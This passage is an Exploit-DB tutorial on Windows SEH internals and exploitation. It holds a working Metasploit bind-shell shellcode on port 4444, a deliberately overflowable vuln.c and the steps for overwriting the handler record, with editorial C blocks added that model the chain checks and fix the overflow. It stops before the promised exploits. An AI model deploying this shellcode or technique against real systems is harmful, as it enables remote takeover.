Playing around with (old?) SEH

EDB-ID: 13036
CVE: N/A
Author: suN8Hclf
Type: papers
Platform: Multiple
Published: 2008-08-18

                     ..//..//..//..//..//.|.\\..\\.\\..\\..\\..
                    [-]                                      [+]
                    [+]     Playing around with (old?)SEH    [-]
                    [-]     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    [+]
                    [+]                                      [-]
                    [-]     bY suN8Hclf aka crimsoN_Loyd9    [+]
                    [+]                                      [-]
                    [-]   DaRk-CodeRs Group production, kid  [+]
                    [+]                                      [-]
                    [-]          www.dark-coders.pl          [+]              
                    [+]                                      [-]
                    [-]              08.06.2008              [+]
                    [+]                                      [-]
                    [-]        suN8Hclf[at]vp{dot}.pl        [+]
                    [+]   crimson{dot}loyd[at]gmail{dot}com  [-]
                    [-]                                      [+]
                     ..\\..\\..\\..\\..\\.|.//..//..//..//..//..



[>>1<<]. Introduction
[>>2<<]. SEH (Structured Exception Handler)
[>>3<<]. Coding SEH
         [>a<] introduction
         [>b<] implementation
[>>4<<]. Exploiting SEH
         [>a<] shellcodes
         [>b<] vulnerable vuln.exe
         [>c<] WIN2000 vs. WINXP SP1 (EBX vs. ESP)
               [***exploit1.c](classic overflow)
               [***exploit2.c](using 2 bytes short reverse jump)
               [***exploit3.c](using long reverse jump)
               [***exploit4.c](execution in TEB block)
[>>5<<]. Summary
[>>6<<]. Further reading
[>>7<<]. Greetz



NOTE: Please excuse my poor English, it's not my mother language.



><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>               [>>1<<]. Introduction                     <
>---------------------------------------------------------<



This paper is about a very powerful but not very well documented mechanism,
introduced and implemented in Windows 2000 SP1-SP4 and XP SP0-SP1,
called Structured Exception Handler (SEH for short).

Some may think that writing about quite old implementations is a waste of time,
now that we have protections such as DEP (Data Execution Prevention), /GS
or /SAFESEH switches. But, in my opinion, this paper contains a good introduction
to the workings of SEH and provides a firm basis for understanding exploitation
methods on Windows Server 2003, Windows XP SP2 or Windows Vista.

This paper is an attempt to show and discuss SEH from the coding and exploitation
side.

At the beginning, I will show how to write our own implementation of the try, except
and finally instructions; later I will discuss some methods of abusing SEH, and
at the end I will show 4 complete working exploits, which abuse SEH to execute
arbitrary code.

For a better understanding of this paper, I recommend that you read my article:
"Shellcode locations and buffer overflows in Windows" [1]

Ok, so let's go!!!


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>      [>>2<<]. SEH (Structured Exception Handler)        <
>---------------------------------------------------------<


A Structured Exception Handler is a piece of code that is executed when a
problem occurs during the execution of a process. This problem can be:

1. an access privilege violation
2. division by 0
3. an attempt to read from or write to a forbidden memory area
It can also be used as a trick to complicate the debugging process.

When we call a function, a special "call frame" is created on the stack.
The information about the exception handler procedure is then placed into
that call frame in the EXCEPTION_REGISTRATION structure. This structure
contains two elements: a pointer to the next EXCEPTION_REGISTRATION structure (*next)
and a pointer to the corresponding exception handler procedure (*handler). It is very
important that every thread of a process has at least one exception handler procedure;
its EXCEPTION_REGISTRATION structure is created during thread creation and is
always located at the beginning of the segment pointed to by the FS register. The last
entry in the list contains the value -1 (0xFFFFFFFF) and the address of the RtlUnwind
function, which is not documented but is located in the kernel32.dll library.

EXCEPTION_REGISTRATION structure looks like the following(C style):

typedef struct _EXCEPTION_REGISTRATION{
	struct _EXCEPTION_REGISTRATION *next;   /* the next record in the list */
	PEXCEPTION_HANDLER handler;             /* the exception handler procedure */
}EXCEPTION_REGISTRATION, *PEXCEPTION_REGISTRATION;


And the linked list of EXCEPTION_REGISTRATION structures looks like this:


               __________________________________
               |Thread Information Block(fs:[0])|----------+
               |           ...                  |          |
               |           ...                  |          |
               |      EXCEPTION_REGISTRATION    |          |
               +--------------------------------+          |
                                                           |
                                                           |
              +----------------------------------+         |
              |     EXCEPTION_REGISTRATION       | <-------+
              +----------------------------------+
              |    [Handler Callback Pointer]    | 
              |                                  |
    +---------|             [*next]              |
    |         +----------------------------------+
    |
    |         +----------------------------------+         
    +-------->|     EXCEPTION_REGISTRATION       | 
              +----------------------------------+         
              |    [Handler Callback Pointer]    |         
              |                                  |         
              |             [*next]              |---------+         
              +----------------------------------+         |
                                                           |
              +----------------------------------+         |
              |     EXCEPTION_REGISTRATION       | <-------+
              +----------------------------------+
              |    [Handler Callback Pointer]    | 
              |                                  |
     +--------|             [*next]              |
     |        +----------------------------------+
     |
     |
     |        +----------------------------------+         
     +------->|          (END OF LIST)           |
              +----------------------------------+
              |           0xFFFFFFFF             |
              +----------------------------------+



><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                  [>>3<<]. Coding SEH                    <
>---------------------------------------------------------<


Many programming languages have a set of special instructions to install
exception handler procedures. For instance, in C/C++ there is the construction
try, except/catch, finally, which catches the exception. Basically, these instructions
only modify the linked list of EXCEPTION_REGISTRATION structures, therefore we
will not use them; for a better and deeper understanding of this mechanism, we will
write everything in assembly language (masm32).


>>>>>>>>>>>>>>>>[>a<] introduction
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's assume that this code appeared in a program(from OllyDbg):

00401000    .  B8 40000000              MOV EAX,40
00401005    .  33C9                     XOR ECX,ECX
00401007    .  F7F9                     IDIV ECX
00401009    .  6A 00                    PUSH 0                            [!]
0040100B    .  E8 00000000              CALL <JMP.&kernel32.ExitProcess>  [!]

This code is guaranteed to raise an exception (division by zero is impossible).
The last two instructions will not be executed. Here is the program's behaviour when the
exception occurs:

ntdll!KiUserExceptionDispatcher

77FA15FC     8B1C24                     MOV EBX,DWORD PTR SS:[ESP]
77FA15FF     51                         PUSH ECX
77FA1600     53                         PUSH EBX                 ; kernel32.79340000
77FA1601     E8 F13AFFFF                CALL ntdll.77F950F7 ------+
                                                                  |
                                                                  |
                                                                  |
                                                                  |
77F950F7     55                         PUSH EBP    <-------------+
77F950F8     8BEC                       MOV EBP,ESP
77F950FA     83EC 60                    SUB ESP,60
77F950FD     53                         PUSH EBX
77F950FE     56                         PUSH ESI      ; kernel32.GetProcAddress
77F950FF     8D45 F4                    LEA EAX,DWORD PTR SS:[EBP-C]
77F95102     57                         PUSH EDI      ; kernel32.79397598
77F95103     50                         PUSH EAX
77F95104     8D45 F8                    LEA EAX,DWORD PTR SS:[EBP-8]
77F95107     50                         PUSH EAX
77F95108     E8 779AFFFF                CALL ntdll.77F8EB84
77F9510D     E8 8D9AFFFF                CALL ntdll.77F8EB9F
77F95112     8365 FC 00                 AND DWORD PTR SS:[EBP-4],0
77F95116     8BD8                       MOV EBX,EAX
77F95118     83FB FF                    CMP EBX,-1
77F9511B     0F84 C1CC0100              JE ntdll.77FB1DE2
77F95121     8B75 08                    MOV ESI,DWORD PTR SS:[EBP+8] 
77F95124     3B5D F8                    CMP EBX,DWORD PTR SS:[EBP-8] ; kernel32.79348EC8
77F95127     8D43 08                    LEA EAX,DWORD PTR DS:[EBX+8]
77F9512A     0F82 AECC0100              JB ntdll.77FB1DDE
77F95130     3B45 F4                    CMP EAX,DWORD PTR SS:[EBP-C] ; kernel32.7935F0B4
77F95133     0F87 A5CC0100              JA ntdll.77FB1DDE
77F95139     F6C3 03                    TEST BL,3
77F9513C     0F85 9CCC0100              JNZ ntdll.77FB1DDE
77F95142     F605 86F5FC77 80           TEST BYTE PTR DS:[77FCF586],80
77F95149     0F85 18CC0100              JNZ ntdll.77FB1D67
77F9514F     FF73 04                    PUSH DWORD PTR DS:[EBX+4]
77F95152     8D45 F0                    LEA EAX,DWORD PTR SS:[EBP-10]
77F95155     50                         PUSH EAX
77F95156     FF75 0C                    PUSH DWORD PTR SS:[EBP+C]
77F95159     53                         PUSH EBX
77F9515A     56                         PUSH ESI          ; kernel32.GetProcAddress
77F9515B     E8 E599FFFF                CALL ntdll.77F8EB45 -------+
                                                                   |
                                                                   |
                                                                   |
                                                                   |
77F8EB45     BA B651F977                MOV EDX,ntdll.77F951B6 <---+
77F8EB4A     55                         PUSH EBP
77F8EB4B     8BEC                       MOV EBP,ESP
77F8EB4D     FF75 0C                    PUSH DWORD PTR SS:[EBP+C]
77F8EB50     52                         PUSH EDX
77F8EB51     64:FF35 00000000           PUSH DWORD PTR FS:[0]
77F8EB58     64:8925 00000000           MOV DWORD PTR FS:[0],ESP
77F8EB5F     FF75 14                    PUSH DWORD PTR SS:[EBP+14]
77F8EB62     FF75 10                    PUSH DWORD PTR SS:[EBP+10]
77F8EB65     FF75 0C                    PUSH DWORD PTR SS:[EBP+C]
77F8EB68     FF75 08                    PUSH DWORD PTR SS:[EBP+8]
77F8EB6B     8B4D 18                    MOV ECX,DWORD PTR SS:[EBP+18]    [4]
77F8EB6E     FFD1                       CALL ECX                         [5]


This code could be analysed at length to learn every detail of how Windows prepares the
handling of exceptions, but that is not essential at this moment. The most
important thing is to understand the general concept, which is presented below:

1. When an exception occurs, the program jumps to KiUserExceptionDispatcher
2. Then the code of the RTLTraceDatabaseEnumerate function is executed
3. Later, a piece of RTLConvertlongToLargeInteger's code
4. Finally, the address of the exception handler procedure is loaded into the
   ECX register ([4]). This is the address from the first structure pointed to by
   fs:[0].
5. There is a jump to the exception handler procedure (call ECX) ([5])
6. Now the exception handler procedure has full control over the program's behaviour.
   This procedure can, for example, close the process in an "elegant" way or try to repair
   the "thing" that caused the exception.


>>>>>>>>>>>>>>[>b<] implementation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Now that we know the basics of exception handling, we can write our own
"implementation" of the try, except/catch, finally construction. To achieve this
we have to create our own EXCEPTION_REGISTRATION structure and insert it
at the beginning of the linked list, so that fs:[0] points to our structure. The
general idea is shown below:


BEFORE
------------------

fs:[0]  ->>> |EXCEPTION_REGISTRATION1|  ->>> |EXCEPTION_REGISTRATION2|  .... ->>> 0xFFFFFFFF


AFTER
------------------

fs:[0]  ->>> |OUR_EXCEPTION_REGISTRATION1| ->>> |EXCEPTION_REGISTRATION1| .... ->>>> 0xFFFFFFFF


To accomplish the state shown above, we have to do the following:

1. Save the pointer from FS:[0], that points to the first EXCEPTION_REGISTRATION
2. Create our own EXCEPTION_REGISTRATION structure where:
   a> the *handler pointer points to our own exception handler procedure
   b> we set the address to the function, which will be "always" executed (finally
      instruction) 
   c> the *next pointer points to the remembered address of the original first 
      EXCEPTION_REGISTRATION structure (original FS:[0] value)
3. Set the address from FS:[0] to point to our EXCEPTION_REGISTRATION structure
4. Save current values of the stack pointer and the frame pointer (ESP and EBP)

To do the second point we can use the following structure:

---------------------------------CODE----------------------------------
SEH struct
	PrevLink dd ?  		; [1]
	CurrentHandler dd ?	; [2]
	SafeOffset dd ?	        ; [3]
	PrevEsp dd ?		; [4]
	PrevEbp dd ?		; [5]
SEH ends
---------------------------------CODE----------------------------------

[1] -> address of the first EXCEPTION_REGISTRATION structure (fs:[0])
[2] -> address of our structured handler procedure
[3] -> address of the procedure to execute "regardless of everything" (finally instruction)
[4] -> current ESP value
[5] -> current EBP value

Next actions:

ad 1.   push fs:[0]
ad 2.a) mov seh.CurrentHandler, OFFSET myFunc
     b) mov seh.SafeOffset, OFFSET final
     c) pop seh.PrevLink
ad 3.   lea eax, seh
        mov fs:[0], eax
ad 4.   mov seh.PrevEsp,esp
        mov seh.PrevEbp,ebp


Here is an example program:


---------------------exception_implementation.asm-----------------

; Compilation:  ml /Cp /c /coff exception_implementation.asm
; Linking    :  link /subsystem:windows exception_implementation.obj


.386
.model flat,stdcall
option casemap:none

include d:\masm32\include\windows.inc
include d:\masm32\include\kernel32.inc
include d:\masm32\include\user32.inc
includelib d:\masm32\lib\user32.lib
includelib d:\masm32\lib\kernel32.lib

SEH struct
	PrevLink dd ?		
	CurrentHandler dd ?	
	SafeOffset dd ?	
	PrevEsp dd ?		
	PrevEbp dd ?		
SEH ends

.data
napis  db "IN exception",0
napis2 db "OUT of Exception",0
tytul  db "Hello",0

.code
start proc
LOCAL seh:SEH

assume fs:nothing
push fs:[0]
pop seh.PrevLink
mov seh.CurrentHandler,offset SEHHandler
mov seh.SafeOffset,offset FinalExit
lea eax,seh
mov fs:[0], eax
mov seh.PrevEsp,esp
mov seh.PrevEbp,ebp

; Now the structured handler procedure has been installed. Every exception
; will execute OUR function (SEHHandler)

mov eax, 40h
mov ecx, 0
idiv ecx        ;lets cause an exception... ;>


FinalExit:
invoke MessageBox, NULL, addr napis2, addr tytul, MB_OK
invoke ExitProcess, 0	
start endp

SEHHandler proc C uses edx pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
	mov edx,pFrame		
	assume edx:ptr SEH
	mov eax,pContext
	assume eax:ptr CONTEXT
	push [edx].SafeOffset
	pop [eax].regEip           
	push [edx].PrevEsp
	pop [eax].regEsp
	push [edx].PrevEbp
	pop [eax].regEbp
      
	invoke MessageBox, NULL, ADDR napis,ADDR tytul, MB_OK

	mov eax,ExceptionContinueExecution
	ret
SEHHandler endp

end start

---------------------exception_implementation.asm-----------------
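To make the list manipulation of steps 1-4 above and the record checks visible in the section 3a listing concrete, here is a portable C model written for this edit; it is not code from the paper, from masm32 or from Windows, and it does not touch a real TEB. The global g_fs0 stands in for fs:[0], the array fake_stack for the thread's stack, and the names seh_install, check_record, walk_chain and the demo functions are this example's own. check_record reproduces, in the same order, the three tests the dispatcher applies to EBX in the Win2000 listing (record below the stack low limit, record end above the high limit, record not 4-byte aligned) before the handler is called. The overwrite demo goes a little beyond the paper's text in showing why those tests do not stop the overwrite of section 4: the record still lies on the stack and is aligned, only its contents have changed.

```c
#include <stddef.h>
#include <stdint.h>

/* Portable model of the paper's EXCEPTION_REGISTRATION record (added example). */
typedef struct _EXCEPTION_REGISTRATION {
    struct _EXCEPTION_REGISTRATION *next;   /* *next: following record or the terminator */
    void (*handler)(void);                  /* *handler: the exception handler procedure  */
} EXCEPTION_REGISTRATION;

/* Chain terminator: -1, the 0xFFFFFFFF of the 32-bit list in the paper. */
#define SEH_END ((EXCEPTION_REGISTRATION *)(uintptr_t)-1)

/* Stand-in for the thread's fs:[0] slot: a plain global, not the real TEB. */
static EXCEPTION_REGISTRATION *g_fs0 = SEH_END;

/* Stack limits the dispatcher compares a record against ([EBP-8] low, [EBP-C] high). */
typedef struct { uintptr_t low, high; } STACK_LIMITS;

enum seh_check { SEH_OK = 0, SEH_OUTSIDE_STACK, SEH_UNALIGNED, SEH_TOO_DEEP };

/* Section 3b, steps 1-3: save fs:[0] in PrevLink, set the handler, point fs:[0] at us. */
void seh_install(EXCEPTION_REGISTRATION *rec, void (*handler)(void))
{
    rec->next = g_fs0;        /* push fs:[0] / pop seh.PrevLink            */
    rec->handler = handler;   /* mov seh.CurrentHandler, offset SEHHandler */
    g_fs0 = rec;              /* lea eax, seh / mov fs:[0], eax            */
}

/* The checks on EBX in the section 3a listing, in the same order and before the
 * record is dereferenced: CMP EBX,[EBP-8]/JB and LEA EAX,[EBX+8]/CMP EAX,[EBP-C]/JA
 * (record must lie within the stack), then TEST BL,3/JNZ (4-byte alignment). */
enum seh_check check_record(const EXCEPTION_REGISTRATION *rec, const STACK_LIMITS *lim)
{
    uintptr_t a = (uintptr_t)rec;
    if (a < lim->low || a + sizeof *rec > lim->high) return SEH_OUTSIDE_STACK;
    if (a & 3)                                         return SEH_UNALIGNED;
    return SEH_OK;
}

/* Walk from fs:[0] to the terminator; report the first failure and how many records passed. */
enum seh_check walk_chain(const STACK_LIMITS *lim, size_t max_depth, size_t *accepted)
{
    const EXCEPTION_REGISTRATION *rec = g_fs0;
    size_t n = 0;
    while (rec != SEH_END) {
        enum seh_check st = check_record(rec, lim);
        if (st != SEH_OK) { *accepted = n; return st; }
        if (++n > max_depth) { *accepted = n; return SEH_TOO_DEEP; }  /* corrupted chains can loop */
        rec = rec->next;
    }
    *accepted = n;
    return SEH_OK;
}

/* Constructed "stack": an array of records (so every slot is aligned) holding a
 * three-record chain installed innermost-last, as nested try blocks would do. */
static EXCEPTION_REGISTRATION fake_stack[8];
static void dummy_handler(void) {}
static STACK_LIMITS fake_limits(void)
{ STACK_LIMITS lim = { (uintptr_t)&fake_stack[0], (uintptr_t)&fake_stack[8] }; return lim; }
static void build_clean_chain(void)
{
    g_fs0 = SEH_END;
    seh_install(&fake_stack[7], dummy_handler);   /* outermost, highest address    */
    seh_install(&fake_stack[5], dummy_handler);
    seh_install(&fake_stack[3], dummy_handler);   /* innermost: fs:[0] points here */
}

/* Clean chain: all three records are accepted. */
size_t demo_clean_chain(void)
{
    size_t n = 0; STACK_LIMITS lim = fake_limits();
    build_clean_chain();
    walk_chain(&lim, 16, &n);
    return n;
}

/* The section 4 overwrite modelled on the innermost record: *next holds the bytes of
 * 'jmp 6' and *handler a code address. The record itself is still on the stack and
 * aligned, so it passes (accepted == 1); the bogus *next fails only when the walk goes on. */
static enum seh_check overwritten_chain(size_t *accepted)
{
    STACK_LIMITS lim = fake_limits();
    build_clean_chain();
    fake_stack[3].next = (EXCEPTION_REGISTRATION *)(uintptr_t)0x909006EB;  /* JUMP of exploit1.c */
    fake_stack[3].handler = dummy_handler;   /* stands in for the jmp ebx / pop-pop-ret address */
    return walk_chain(&lim, 16, accepted);
}
enum seh_check demo_overwritten_status(void)   { size_t n = 0; return overwritten_chain(&n); }
size_t         demo_overwritten_accepted(void) { size_t n = 0; overwritten_chain(&n); return n; }

/* A record pointer inside the stack but not 4-byte aligned: rejected by TEST BL,3. */
enum seh_check demo_unaligned_record(void)
{
    size_t n = 0; STACK_LIMITS lim = fake_limits();
    build_clean_chain();
    g_fs0 = (EXCEPTION_REGISTRATION *)((char *)&fake_stack[4] + 1);
    return walk_chain(&lim, 16, &n);
}
```

The overwritten record passing every check is the reason later protections look at the *handler value rather than at where the record lives: the /SAFESEH switch mentioned in the introduction lets the dispatcher accept only handlers listed in the module's registered handler table, and the walk's depth limit is the kind of guard a chain corrupted with a self-pointing *next needs.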


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                  [>>4<<]. Exploiting SEH                <
>---------------------------------------------------------<


>>>>>>>>>>>>>>>>[>a<] shellcodes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Throughout this paper I will be using two shellcodes:

>The first one<:

"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";

In detail:

00401B7C     EB 02          JMP SHORT vuln.00401B80
00401B7E     EB 05          JMP SHORT vuln.00401B85
00401B80     E8 F9FFFFFF    CALL vuln.00401B7E
00401B85     5B             POP EBX
00401B86     33C9           XOR ECX,ECX
00401B88     83C3 35        ADD EBX,35
00401B8B     880B           MOV BYTE PTR DS:[EBX],CL
00401B8D     83EB 06        SUB EBX,6
00401B90     53             PUSH EBX
00401B91     B8 CF053579    MOV EAX,KERNEL32.LoadLibraryA  //check the address of LoadLibraryA on your own
00401B96     FFD0           CALL EAX
00401B98     33C9           XOR ECX,ECX
00401B9A     51             PUSH ECX
00401B9B     53             PUSH EBX
00401B9C     53             PUSH EBX
00401B9D     51             PUSH ECX
00401B9E     05 11111111    ADD EAX,11111111  
00401BA3     2D 79900E11    SUB EAX,110E9079 
00401BA8     FFD0           CALL EAX                 //here, in eax should be an address of 
00401BAA     33C9           XOR ECX,ECX              //MessageBoxA function
00401BAC     51             PUSH ECX
00401BAD     B8 1AE03479    MOV EAX,KERNEL32.ExitProcess      //address of ExitProcess
00401BB2     FFD0           CALL EAX
00401BB4     75 73          JNZ SHORT vuln.00401C29          //coded 'user32.dll' string
00401BB6     65:72 33       JB SHORT vuln.00401BEC
00401BB9     3261           XOR AL,BYTE PTR DS:[EAX]

Wow, I wrote it under Windows 2000 Service Pack 4 (Polish). If you are
using another Windows platform, you should change the addresses of LoadLibraryA,
MessageBoxA and ExitProcess in kernel32 and user32 to the correct ones.
As you can see, this simple code just invokes MessageBoxA and then
terminates the process.

>The second one<

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ]  
//http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";


The second one was generated with the Metasploit Framework. It binds a
Windows shell (cmd.exe) to port 4444 and waits for a connection.


>>>>>>>>>>[>b<] vulnerable vuln.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Generally speaking, during exploitation we want to overwrite the
*handler pointer. This is the only thing we have to do if we want our code
to be executed during an exception.
Ok, so now an exception occurs...
Then the overwritten *handler pointer is loaded into the ECX register and
called (call ECX). And now we have a problem...
Where should we jump?

In Windows 2000 SP1-SP4 and unpatched Windows XP, during the preparation to execute
the Structured Exception Handler and during the execution of the *handler code, the EBX
register points to the current EXCEPTION_REGISTRATION structure. The easiest way to execute
our own code looks like the following:

1. The *next field is overwritten with a short jump 6 bytes ahead
2. The *handler field is overwritten with the address of a jump to EBX (jmp EBX, call EBX,
   push EBX / ret)
3. We put our shellcode, with a NOP sled in front of it, behind the EXCEPTION_REGISTRATION structure

Before we test this idea, let's write a very simple and vulnerable program:

----------------vuln.c---------------------
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{
  char buffer[300];
  int a;
  strcpy(buffer, argv[1]);   /* [1] unbounded copy into a 300-byte stack buffer */
  a=3/0;                     /* [2] deliberately raises an exception */
  return 0;
}
---------------vuln.c----------------------

Before we start, let's set some guidelines. First of all, to accomplish
the scenario I have described above, it is essential to cause an
exception in the vulnerable program. If we run vuln.exe with
a short string, it will crash on instruction [2]. It raises an exception,
the default *handler procedure is executed, the program is terminated and
we lose the chance to gain administrator privileges :).
On the other hand, instruction [1] (the one above [2]) copies data into a fixed-size
buffer on the stack and does not check the data's length. So we can cause a
buffer overflow and execute our code. Of course, in practice instruction [2] would
not be there, because the overwritten EIP register (classic buffer overflow)
would cause the exception. [2] is only here to show that the program will not crash
on the division by 0, and will execute our code instead.
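The hardened counterpart of vuln.c, written for this edit (it is not code from the paper): the strcpy of instruction [1] is replaced by a copy that refuses any argument that does not fit in the 300-byte buffer, and the deliberate division of [2] is dropped. The names copy_bounded, hardened_main and the demo functions are this example's own. The constructed inputs include a 499-byte argument, longer than the 416 bytes the paper needs to reach the *next pointer; it is rejected instead of overwriting the EXCEPTION_REGISTRATION record.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 300   /* same size as the buffer in vuln.c */

/* Copy src into dst only when it fits, terminator included.
 * Returns 0 on success; -1 when src is missing or too long, leaving dst empty.
 * memchr bounds the scan of src to dst_size bytes, so an over-long argument
 * is never read beyond what the buffer could hold. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    const char *nul;
    if (dst_size == 0) return -1;
    dst[0] = '\0';
    if (src == NULL) return -1;
    nul = memchr(src, '\0', dst_size);
    if (nul == NULL) return -1;               /* no terminator within dst_size: reject */
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* main() of vuln.c rebuilt around the bounded copy (hypothetical name). */
int hardened_main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        fputs("usage: vuln <string>\n", stderr);
        return 2;
    }
    if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %u bytes)\n", (unsigned)(sizeof buffer - 1));
        return 1;
    }
    printf("copied %u bytes\n", (unsigned)strlen(buffer));
    return 0;
}

/* Constructed inputs: a short argument, and one of 499 'A's that would have
 * run well past the 416-byte distance to the EXCEPTION_REGISTRATION record. */
int demo_short_argument(void)
{
    char *argv[] = { "vuln.exe", "hello", NULL };
    return hardened_main(2, argv);
}

int demo_overlong_argument(void)
{
    static char big[500];
    char *argv[] = { "vuln.exe", big, NULL };
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return hardened_main(2, argv);
}

/* Boundary: exactly 299 characters fit, 300 do not. Returns 1 when both hold. */
int demo_boundary(void)
{
    char dst[BUF_SIZE];
    static char src[BUF_SIZE + 1];
    memset(src, 'B', BUF_SIZE);
    src[BUF_SIZE] = '\0';                                  /* 300 chars: too long */
    if (copy_bounded(dst, sizeof dst, src) != -1) return 0;
    src[BUF_SIZE - 1] = '\0';                              /* 299 chars: fits */
    if (copy_bounded(dst, sizeof dst, src) != 0) return 0;
    return strlen(dst) == BUF_SIZE - 1;
}
```

strncpy would not be a fix on its own: it neither reports truncation nor guarantees a terminating NUL when the source fills the buffer, which is why the copy above looks for the NUL with memchr before touching dst. On a real build, the /GS and /SAFESEH switches named in the introduction are the compiler-side complements to this source-level fix.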


[NOTE1 !!!!!]
*******************************************************************************
*To make our thinking much easier, let's assume that 416 bytes is the maximum *
*amount of data that DOES NOT overwrite the *next pointer in the              *
*EXCEPTION_REGISTRATION structure on the stack.                               *
*******************************************************************************

[NOTE2!!!!]
*******************************************************************************
*All constant values in the exploits' code were determined during testing and *
*debugging. It is a mistake to assume that they are right in all conditions.  *
*If you fully understand the method of exploitation, you will have no         *
*problems choosing the right "constant" values.                               *
*******************************************************************************


>>>>>>>>[>c<] WIN2000 vs. WINXP SP1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As I wrote above, in Win2000 and unpatched WinXP, during the preparation for
and execution of the exception handler procedure, the EBX register
points to the current EXCEPTION_REGISTRATION structure. In this case the situation
is quite simple: we overwrite the *handler pointer with a jmp EBX and
we have full control over program execution.

The problem occurs in Windows XP SP1. Here, the code that prepares to pass
control to the exception handler procedure additionally zeroes the
"critical" registers:


(from ntdll.dll):

7C903767    53              PUSH EBX
7C903768    56              PUSH ESI
7C903769    57              PUSH EDI                     ; ntdll.7C910738
7C90376A    33C0            XOR EAX,EAX
7C90376C    33DB            XOR EBX,EBX    <-- fuck, and what we gonna do now? ;( 
7C90376E    33F6            XOR ESI,ESI
7C903770    33FF            XOR EDI,EDI                  ; ntdll.7C910738

Later there is code that is useless for us, and then the exception handler
procedure is executed (the same as in Win2000):

(from ntdll.dll)

7C903799    55              PUSH EBP
7C90379A    8BEC            MOV EBP,ESP
7C90379C    FF75 0C         PUSH DWORD PTR SS:[EBP+C]
7C90379F    52              PUSH EDX                                 ; ntdll.7C9037D8
7C9037A0    64:FF35 0000000>PUSH DWORD PTR FS:[0]
7C9037A7    64:8925 0000000>MOV DWORD PTR FS:[0],ESP
7C9037AE    FF75 14         PUSH DWORD PTR SS:[EBP+14]
7C9037B1    FF75 10         PUSH DWORD PTR SS:[EBP+10]
7C9037B4    FF75 0C         PUSH DWORD PTR SS:[EBP+C]
